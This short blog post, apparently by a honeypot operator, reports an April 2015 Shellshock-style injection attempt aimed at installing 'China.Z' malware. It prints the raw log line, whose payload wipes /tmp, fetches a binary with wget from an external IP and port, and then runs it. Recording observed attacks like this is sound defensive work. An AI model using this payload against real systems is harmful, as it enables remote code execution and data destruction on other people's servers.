Mittwoch, 15. April 2015

China.Z malware

On the 12th of April my Honeypot server received an attempt of a shellinjection attack.
Taret was to download and run the China.Z malware.

27.17.5.140 - - [12/Apr/2015:14:10:20 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Today, the malware was not available for download anymore, so if you need additional information please go to Virustotal

 The source address for this IP is located in China.